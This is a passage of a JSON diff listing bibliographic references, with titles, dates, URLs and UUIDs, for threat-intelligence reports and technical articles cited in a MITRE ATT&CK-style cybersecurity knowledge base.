"https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/" + ], + "source": "MITRE", + "title": "Tunnel of Gov: DNC Hack and the Russian XTunnel" + }, + "related": [], + "uuid": "43773784-92b8-4722-806c-4b1fc4278bb0", + "value": "Invincea XTunnel" + }, + { + "description": "Fidelis Threat Research Team. (2016, May 2). Turbo Twist: Two 64-bit Derusbi Strains Converge. Retrieved August 16, 2018.", + "meta": { + "date_accessed": "2018-08-16T00:00:00Z", + "date_published": "2016-05-02T00:00:00Z", + "refs": [ + "https://www.fidelissecurity.com/threatgeek/threat-intelligence/turbo-twist-two-64-bit-derusbi-strains-converge" + ], + "source": "MITRE", + "title": "Turbo Twist: Two 64-bit Derusbi Strains Converge" + }, + "related": [], + "uuid": "a386b614-a808-42cf-be23-658f71b31560", + "value": "ThreatGeek Derusbi Converge" + }, + { + "description": "Hawley, S. et al. (2023, February 2). Turla: A Galaxy of Opportunity. Retrieved May 15, 2023.", + "meta": { + "date_accessed": "2023-05-15T00:00:00Z", + "date_published": "2023-02-02T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity" + ], + "source": "MITRE", + "title": "Turla: A Galaxy of Opportunity" + }, + "related": [], + "uuid": "d8f43a52-a59e-5567-8259-821b1b6bde43", + "value": "Mandiant Suspected Turla Campaign February 2023" + }, + { + "description": "Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.", + "meta": { + "date_accessed": "2020-12-04T00:00:00Z", + "date_published": "2020-12-02T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" + ], + "source": "MITRE", + "title": "Turla Crutch: Keeping the “back door” open" + }, + "related": [], + "uuid": "8b2f40f5-7dca-4edf-8314-a8f5bc4831b8", + "value": "ESET Crutch December 2020" + }, + { + "description": "Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.", + "meta": { + "date_accessed": "2019-06-24T00:00:00Z", + "date_published": "2019-05-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf" + ], + "source": "MITRE", + "title": "Turla LightNeuron: One email away from remote code execution" + }, + "related": [], + "uuid": "679aa333-572c-44ba-b94a-606f168d1ed2", + "value": "ESET LightNeuron May 2019" + }, + { + "description": "ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.", + "meta": { + "date_accessed": "2018-07-03T00:00:00Z", + "date_published": "2018-05-22T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" + ], + "source": "MITRE", + "title": "Turla Mosquito: A shift towards more generic tools" + }, + "related": [], + "uuid": "d683b8a2-7f90-4ae3-b763-c25fd701dbf6", + "value": "ESET Turla Mosquito May 2018" + }, + { + "description": "ESET. (2018, August). Turla Outlook Backdoor: Analysis of an unusual Turla backdoor. Retrieved March 11, 2019.", + "meta": { + "date_accessed": "2019-03-11T00:00:00Z", + "date_published": "2018-08-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" + ], + "source": "MITRE", + "title": "Turla Outlook Backdoor: Analysis of an unusual Turla backdoor" + }, + "related": [], + "uuid": "e725fb9d-65b9-4e3f-9930-13c2c74b7fa4", + "value": "ESET Turla August 2018" + }, + { + "description": "Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.", + "meta": { + "date_accessed": "2020-12-02T00:00:00Z", + "date_published": "2020-10-01T00:00:00Z", + "refs": [ + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity" + ], + "source": "MITRE", + "title": "Turla uses HyperStack, Carbon, and Kazuar to compromise government entity" + }, + "related": [], + "uuid": "680f2a0b-f69d-48bd-93ed-20ee2f79e3f7", + "value": "Accenture HyperStack October 2020" + }, + { + "description": "Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "refs": [ + "https://support.google.com/a/answer/7223765?hl=en" + ], + "source": "MITRE", + "title": "Turn Gmail delegation on or off" + }, + "related": [], + "uuid": "dfd28a01-56ba-4c0c-9742-d8b1db49df06", + "value": "Gmail Delegation" + }, + { + "description": "Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2020-02-12T00:00:00Z", + "refs": [ + "https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/" + ], + "source": "MITRE", + "title": "Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments" + }, + "related": [], + "uuid": "3dc4b69c-8cae-4489-8df2-5f55419fb3b1", + "value": "Google Cloud Privilege Escalation" + }, + { + "description": "Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.", + "meta": { + "date_accessed": "2021-07-26T00:00:00Z", + "date_published": "2020-05-19T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh" + ], + "source": "MITRE", + "title": "Tutorial: SSH in Windows Terminal" + }, + "related": [], + "uuid": "3006af23-b802-400f-841d-7eea7d748d28", + "value": "SSH in Windows" + }, + { + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "date_published": "2016-12-14T00:00:00Z", + "refs": [ + "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe" + }, + "related": [], + "uuid": "87c9f8e4-f8d1-4f19-86ca-6fd18a33890b", + "value": "Microsoft NEODYMIUM Dec 2016" + }, + { + "description": "Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.", + "meta": { + "date_accessed": "2023-03-24T00:00:00Z", + "date_published": "2023-03-24T00:00:00Z", + "refs": [ + "https://twitter.com/rfackroyd/status/1639136000755765254" + ], + "source": "MITRE", + "title": "Twitter" + }, + "related": [], + "uuid": "7d701a8e-6816-5112-ac16-b36e71d7c5db", + "value": "Twitter Richard WMIC" + }, + { + "description": "Carr, N.. (2017, April 6). Retrieved June 29, 2017.", + "meta": { + "date_accessed": "2017-06-29T00:00:00Z", + "refs": [ + "https://twitter.com/ItsReallyNick/status/850105140589633536" + ], + "source": "MITRE", + "title": "Twitter Nick Carr APT10" + }, + "related": [], + "uuid": "0f133f2c-3b02-4b3b-a960-ef6a7862cf8f", + "value": "Twitter Nick Carr APT10" + }, + { + "description": "Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2018-08-30T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/two-birds-one-stone-panda/" + ], + "source": "MITRE", + "title": "Two Birds, One Stone Panda" + }, + "related": [], + "uuid": "42fe94f5-bc4c-4b0b-9c35-0bc32cbc5d79", + "value": "Crowdstrike KRYPTONITE PANDA August 2018" + }, + { + "description": "Douglas Bonderud. (2018, September 17). Two New Monero Malware Attacks Target Windows and Android Users. Retrieved June 5, 2023.", + "meta": { + "date_accessed": "2023-06-05T00:00:00Z", + "date_published": "2018-09-17T00:00:00Z", + "refs": [ + "https://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-users/" + ], + "source": "MITRE", + "title": "Two New Monero Malware Attacks Target Windows and Android Users" + }, + "related": [], + "uuid": "a797397b-2af7-58b9-b66a-5ded260659f0", + "value": "Two New Monero Malware Attacks Target Windows and Android Users" + }, + { + "description": "Hacquebord, F.. (2017, April 25). Two Years of Pawn Storm: Examining an Increasingly Relevant Threat. Retrieved May 3, 2017.", + "meta": { + "date_accessed": "2017-05-03T00:00:00Z", + "date_published": "2017-04-25T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf" + ], + "source": "MITRE", + "title": "Two Years of Pawn Storm: Examining an Increasingly Relevant Threat" + }, + "related": [], + "uuid": "d92f22a7-7753-47da-a850-00c073b5fd27", + "value": "Trend Micro Pawn Storm April 2017" + }, + { + "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.", + "meta": { + "date_accessed": "2020-06-24T00:00:00Z", + "date_published": "2019-04-30T00:00:00Z", + "refs": [ + "https://offsec.almond.consulting/UAC-bypass-dotnet.html" + ], + "source": "MITRE", + "title": "UAC bypass via elevated .NET applications" + }, + "related": [], + "uuid": "a49c5870-2a48-4cd7-8b4e-e80c5414f565", + "value": "Almond COR_PROFILER Apr 2019" + }, + { + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "meta": { + "date_accessed": "2016-07-26T00:00:00Z", + "date_published": "2016-06-16T00:00:00Z", + "refs": [ + "https://github.com/hfiref0x/UACME" + ], + "source": "MITRE", + "title": "UACMe" + }, + "related": [], + "uuid": "7006d59d-3b61-4030-a680-5dac52133722", + "value": "Github UACMe" + }, + { + "description": "Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2018-10-17T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0" + ], + "source": "MITRE", + "title": "Ubiquitous SEO Poisoning URLs" + }, + "related": [], + "uuid": "f117cfa5-1bad-43ae-9eaa-3b9123061f93", + "value": "ZScaler SEO" + }, + { + "description": "Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.", + "meta": { + "date_accessed": "2018-01-12T00:00:00Z", + "date_published": "2017-11-28T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/" + ], + "source": "MITRE", + "title": "UBoatRAT Navigates East Asia" + }, + "related": [], + "uuid": "235a1129-2f35-4861-90b8-1f761d89b0f9", + "value": "PaloAlto UBoatRAT Nov 2017" + }, + { + "description": "UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.", + "meta": { + "date_accessed": "2021-04-16T00:00:00Z", + "date_published": "2021-04-15T00:00:00Z", + "refs": [ + "https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise" + ], + "source": "MITRE", + "title": "UK and US call out Russia for SolarWinds compromise" + }, + "related": [], + "uuid": "f49e6780-8caa-4c3c-8d68-47a2cc4319a1", + "value": "UK NSCS Russia SolarWinds April 2021" + }, + { + "description": "UK Gov. (2021, April 15). UK and US expose global campaign of malign activity by Russian intelligence services . Retrieved April 16, 2021.", + "meta": { + "date_accessed": "2021-04-16T00:00:00Z", + "date_published": "2021-04-15T00:00:00Z", + "refs": [ + "https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services" + ], + "source": "MITRE", + "title": "UK and US expose global campaign of malign activity by Russian intelligence services" + }, + "related": [], + "uuid": "7fe5a605-c33e-4d3d-b787-2d1f649bee53", + "value": "UK Gov Malign RIS Activity April 2021" + }, + { + "description": "UK Gov. (2021, April 15). UK exposes Russian involvement in SolarWinds cyber compromise . Retrieved April 16, 2021.", + "meta": { + "date_accessed": "2021-04-16T00:00:00Z", + "date_published": "2021-04-15T00:00:00Z", + "refs": [ + "https://www.gov.uk/government/news/russia-uk-exposes-russian-involvement-in-solarwinds-cyber-compromise" + ], + "source": "MITRE", + "title": "UK exposes Russian involvement in SolarWinds cyber compromise" + }, + "related": [], + "uuid": "ffbd83d7-9d4f-42b9-adc0-eb144045aef2", + "value": "UK Gov UK Exposes Russia SolarWinds April 2021" + }, + { + "description": "UK NCSC. (2020, October 19). UK exposes series of Russian cyber attacks against Olympic and Paralympic Games . Retrieved November 30, 2020.", + "meta": { + "date_accessed": "2020-11-30T00:00:00Z", + "date_published": "2020-10-19T00:00:00Z", + "refs": [ + "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games" + ], + "source": "MITRE", + "title": "UK exposes series of Russian cyber attacks against Olympic and Paralympic Games" + }, + "related": [], + "uuid": "93053f1b-917c-4573-ba20-99fcaa16a2dd", + "value": "UK NCSC Olympic Attacks October 2020" + }, + { + "description": "Biasini, N. et al.. (2022, January 21). Ukraine Campaign Delivers Defacement and Wipers, in Continued Escalation. Retrieved March 14, 2022.", + "meta": { + "date_accessed": "2022-03-14T00:00:00Z", + "date_published": "2022-01-21T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html" + ], + "source": "MITRE", + "title": "Ukraine Campaign Delivers Defacement and Wipers, in Continued Escalation" + }, + "related": [], + "uuid": "db17cc3d-9cd3-4faa-9de9-3b8fbec909c3", + "value": "Cisco Ukraine Wipers January 2022" + }, + { + "description": "Symantec Threat Hunter Team. (2022, February 24). Ukraine: Disk-wiping Attacks Precede Russian Invasion. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2022-02-24T00:00:00Z", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia" + ], + "source": "MITRE", + "title": "Ukraine: Disk-wiping Attacks Precede Russian Invasion" + }, + "related": [], + "uuid": "3ed4cd00-3387-4b80-bda8-0a190dc6353c", + "value": "Symantec Ukraine Wipers February 2022" + }, + { + "description": "Toulas, B. (2018, November 4). Ukraine links members of Gamaredon hacker group to Russian FSB. Retrieved April 15, 2022.", + "meta": { + "date_accessed": "2022-04-15T00:00:00Z", + "date_published": "2018-11-04T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/" + ], + "source": "MITRE", + "title": "Ukraine links members of Gamaredon hacker group to Russian FSB" + }, + "related": [], + "uuid": "c565b025-df74-40a9-9535-b630ca06f777", + "value": "Bleepingcomputer Gamardeon FSB November 2021" + }, + { + "description": "Dani, M. (2022, March 1). Ukrainian Targets Hit by HermeticWiper, New Datawiper Malware. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2022-03-01T00:00:00Z", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware" + ], + "source": "MITRE", + "title": "Ukrainian Targets Hit by HermeticWiper, New Datawiper Malware" + }, + "related": [], + "uuid": "2b25969b-2f0b-4204-9277-596e80c4e626", + "value": "Qualys Hermetic Wiper March 2022" + }, + { + "description": "Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.", + "meta": { + "date_accessed": "2018-04-10T00:00:00Z", + "date_published": "2018-03-01T00:00:00Z", + "refs": [ + "https://github.com/api0cradle/UltimateAppLockerByPassList" + ], + "source": "MITRE", + "title": "Ultimate AppLocker Bypass List" + }, + "related": [], + "uuid": "a2fa7fb8-ddba-44cf-878f-448fb2aa6149", + "value": "GitHub Ultimate AppLocker Bypass List" + }, + { + "description": "UCF. (n.d.). Unauthorized accounts must not have the Create symbolic links user right.. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "refs": [ + "https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482" + ], + "source": "MITRE", + "title": "Unauthorized accounts must not have the Create symbolic links user right." + }, + "related": [], + "uuid": "93716db0-6f88-425c-af00-ed2e941214d3", + "value": "UCF STIG Symbolic Links" + }, + { + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.", + "meta": { + "date_accessed": "2021-06-02T00:00:00Z", + "date_published": "2021-04-29T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + ], + "source": "MITRE", + "title": "UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat" + }, + "related": [], + "uuid": "832aeb46-b248-43e8-9157-a2f56bcd1806", + "value": "FireEye FiveHands April 2021" + }, + { + "description": "Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.", + "meta": { + "date_accessed": "2023-08-17T00:00:00Z", + "date_published": "2022-05-02T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email" + ], + "source": "MITRE", + "title": "UNC3524: Eye Spy on Your Email" + }, + "related": [], + "uuid": "452ca091-42b1-5bef-8a01-921c1f46bbee", + "value": "Mandiant APT29 Eye Spy Email Nov 22" + }, + { + "description": "Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.", + "meta": { + "date_accessed": "2021-11-12T00:00:00Z", + "date_published": "2020-02-01T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Uncovering DRBControl" + }, + "related": [], + "uuid": "4dfbf26d-023b-41dd-82c8-12fe18cb10e6", + "value": "Trend Micro DRBControl February 2020" + }, + { + "description": "Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022.", + "meta": { + "date_accessed": "2022-08-11T00:00:00Z", + "date_published": "2021-11-15T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/" + ], + "source": "MITRE", + "title": "Uncovering MosesStaff techniques: Ideology over Money" + }, + "related": [], + "uuid": "d6da2849-cff0-408a-9f09-81a33fc88a56", + "value": "Checkpoint MosesStaff Nov 2021" + }, + { + "description": "Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.", + "meta": { + "date_accessed": "2021-02-25T00:00:00Z", + "date_published": "2013-09-16T00:00:00Z", + "refs": [ + "https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/" + ], + "source": "MITRE", + "title": "Understanding a little more about /etc/profile and /etc/bashrc" + }, + "related": [], + "uuid": "503a4cd6-5cfe-4cce-b363-0cf3c8bc9feb", + "value": "bencane blog bashrc" + }, + { + "description": "Juniper. (2020, September 23). Understanding and Using Dynamic ARP Inspection (DAI). Retrieved October 15, 2020.", + "meta": { + "date_accessed": "2020-10-15T00:00:00Z", + "date_published": "2020-09-23T00:00:00Z", + "refs": [ + "https://www.juniper.net/documentation/en_US/junos/topics/task/configuration/understanding-and-using-dai.html" + ], + "source": "MITRE", + "title": "Understanding and Using Dynamic ARP Inspection (DAI)" + }, + "related": [], + "uuid": "f63b099d-a316-42a1-b1ce-17f11d0f3d2e", + "value": "Juniper DAI 2020" + }, + { + "description": "Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2022-03-31T00:00:00Z", + "refs": [ + "https://cloud.google.com/iam/docs/policies" + ], + "source": "MITRE", + "title": "Understanding policies" + }, + "related": [], + "uuid": "b23a0df2-923d-4a5d-a40c-3ae218a0be94", + "value": "Google Cloud IAM Policies" + }, + { + "description": "Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html" + ], + "source": "MITRE", + "title": "Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches" + }, + "related": [], + "uuid": "a6f62986-0b62-4316-b762-021f1bb14903", + "value": "Juniper Traffic Mirroring" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, June 14). Understanding Ransomware Threat Actors: LockBit. Retrieved June 30, 2023.", + "meta": { + "date_accessed": "2023-06-30T00:00:00Z", + "date_published": "2023-06-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a" + ], + "source": "Tidal Cyber", + "title": "Understanding Ransomware Threat Actors: LockBit" + }, + "related": [], + "uuid": "9c03b801-2ebe-4c7b-aa29-1b7a3625964a", + "value": "U.S. CISA Understanding LockBit June 2023" + }, + { + "description": "Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021.", + "meta": { + "date_accessed": "2021-12-16T00:00:00Z", + "refs": [ + "https://auth0.com/learn/refresh-tokens/" + ], + "source": "MITRE", + "title": "Understanding Refresh Tokens" + }, + "related": [], + "uuid": "84eb3d8a-f6b1-4bb5-9411-2c8da29b5946", + "value": "Auth0 Understanding Refresh Tokens" + }, + { + "description": "baeldung. (2022, April 8). Understanding the Linux /proc/id/maps File. Retrieved March 31, 2023.", + "meta": { + "date_accessed": "2023-03-31T00:00:00Z", + "date_published": "2022-04-08T00:00:00Z", + "refs": [ + "https://www.baeldung.com/linux/proc-id-maps" + ], + "source": "MITRE", + "title": "Understanding the Linux /proc/id/maps File" + }, + "related": [], + "uuid": "b70d04e4-c5f9-5cb2-b896-9bd64e97369e", + "value": "baeldung Linux proc map 2022" + }, + { + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "meta": { + "date_accessed": "2020-10-28T00:00:00Z", + "date_published": "2020-10-28T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + ], + "source": "MITRE", + "title": "Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser" + }, + "related": [], + "uuid": "59162ffd-cb95-4757-bb1e-0c2a4ad5c083", + "value": "FireEye KEGTAP SINGLEMALT October 2020" + }, + { + "description": "Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.", + "meta": { + "date_accessed": "2017-07-11T00:00:00Z", + "date_published": "2017-07-10T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface" + ], + "source": "MITRE", + "title": "Unified Extensible Firmware Interface" + }, + "related": [], + "uuid": "681c6a57-76db-410b-82d6-4e614bcdb6e0", + "value": "Wikipedia UEFI" + }, + { + "description": "Miller-Osborn, J., Grunzweig, J.. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.", + "meta": { + "date_accessed": "2015-11-04T00:00:00Z", + "date_published": "2015-04-01T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" + ], + "source": "MITRE", + "title": "Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets" + }, + "related": [], + "uuid": "82c1ed0d-a41d-4212-a3ae-a1d661bede2d", + "value": "New DragonOK" + }, + { + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-12-15T00:00:00Z", + "refs": [ + "https://pan-unit42.github.io/playbook_viewer/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Unit 42 Playbook Viewer" + }, + "related": [], + "uuid": "9923f9ff-a7b8-4058-8213-3c83c54c10a6", + "value": "Unit 42 Playbook Dec 2017" + }, + { + "description": "Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2015-07-14T00:00:00Z", + "refs": [ + "http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/" + ], + "source": "MITRE", + "title": "Unit 42 Technical Analysis: Seaduke" + }, + "related": [], + "uuid": "735d38da-9214-4141-86af-11eefa5c4d04", + "value": "Unit 42 SeaDuke 2015" + }, + { + "description": "Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023.", + "meta": { + "date_accessed": "2023-09-29T00:00:00Z", + "date_published": "2022-04-11T00:00:00Z", + "refs": [ + "https://0xjet.github.io/3OHA/2022/04/11/post.html" + ], + "source": "MITRE", + "title": "UNIX daemonization and the double fork" + }, + "related": [], + "uuid": "521b79fe-bb7b-52fd-a899-b73e254027a5", + "value": "3OHA double-fork 2022" + }, + { + "description": "Flashpoint. (2023, June 20). Unmasking Anonymous Sudan: Timeline of DDoS Attacks, Affiliations, and Motivations. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-06-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://flashpoint.io/blog/anonymous-sudan-ddos-timeline/" + ], + "source": "Tidal Cyber", + "title": "Unmasking Anonymous Sudan: Timeline of DDoS Attacks, Affiliations, and Motivations" + }, + "related": [], + "uuid": "2e7060d2-f7bc-457e-a2e6-12897d503ea6", + "value": "Flashpoint Anonymous Sudan Timeline" + }, + { + "description": "Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2020-07-13T00:00:00Z", + "refs": [ + "https://o365blog.com/post/on-prem_admin/" + ], + "source": "MITRE", + "title": "Unnoticed sidekick: Getting access to cloud as an on-prem admin" + }, + "related": [], + "uuid": "7a6a7ecd-b9c7-4371-9924-34733597556c", + "value": "AADInternals Azure AD On-Prem to Cloud" + }, + { + "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.", + "meta": { + "date_accessed": "2015-12-23T00:00:00Z", + "date_published": "2015-11-13T00:00:00Z", + "refs": [ + "https://adsecurity.org/?page_id=1821" + ], + "source": "MITRE", + "title": "Unofficial Guide to Mimikatz & Command Reference" + }, + "related": [], + "uuid": "b251ed65-a145-4053-9dc2-bf0dad83d76c", + "value": "Adsecurity Mimikatz Guide" + }, + { + "description": "GREAT. (2017, April 11). Unraveling the Lamberts Toolkit. Retrieved March 21, 2022.", + "meta": { + "date_accessed": "2022-03-21T00:00:00Z", + "date_published": "2017-04-11T00:00:00Z", + "refs": [ + "https://securelist.com/unraveling-the-lamberts-toolkit/77990/" + ], + "source": "MITRE", + "title": "Unraveling the Lamberts Toolkit" + }, + "related": [], + "uuid": "2be23bfb-c6fb-455e-ae88-2ae910ccef60", + "value": "Kaspersky Lamberts Toolkit April 2017" + }, + { + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "meta": { + "date_accessed": "2020-05-12T00:00:00Z", + "date_published": "2019-05-30T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + ], + "source": "MITRE", + "title": "Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER" + }, + "related": [], + "uuid": "103f2b78-81ed-4096-a67a-dedaffd67e9b", + "value": "CrowdStrike Grim Spider May 2019" + }, + { + "description": "LOLBAS. (2021, December 6). Unregmp2.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-12-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/" + ], + "source": "Tidal Cyber", + "title": "Unregmp2.exe" + }, + "related": [], + "uuid": "9ad11187-bf91-4205-98c7-c7b981e4ab6f", + "value": "Unregmp2.exe - LOLBAS Project" + }, + { + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "meta": { + "date_accessed": "2018-07-10T00:00:00Z", + "date_published": "2017-12-01T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + ], + "source": "MITRE", + "title": "Untangling the Patchwork Cyberespionage Group" + }, + "related": [], + "uuid": "15465b26-99e1-4956-8c81-cda3388169b8", + "value": "TrendMicro Patchwork Dec 2017" + }, + { + "description": "Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2014-02-11T00:00:00Z", + "refs": [ + "https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf" + ], + "source": "MITRE", + "title": "Unveiling “Careto” - The Masked APT" + }, + "related": [], + "uuid": "547f1a4a-7e4a-461d-8c19-f4775cd60ac0", + "value": "Kaspersky Careto" + }, + { + "description": "Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-01-01T00:00:00Z", + "refs": [ + 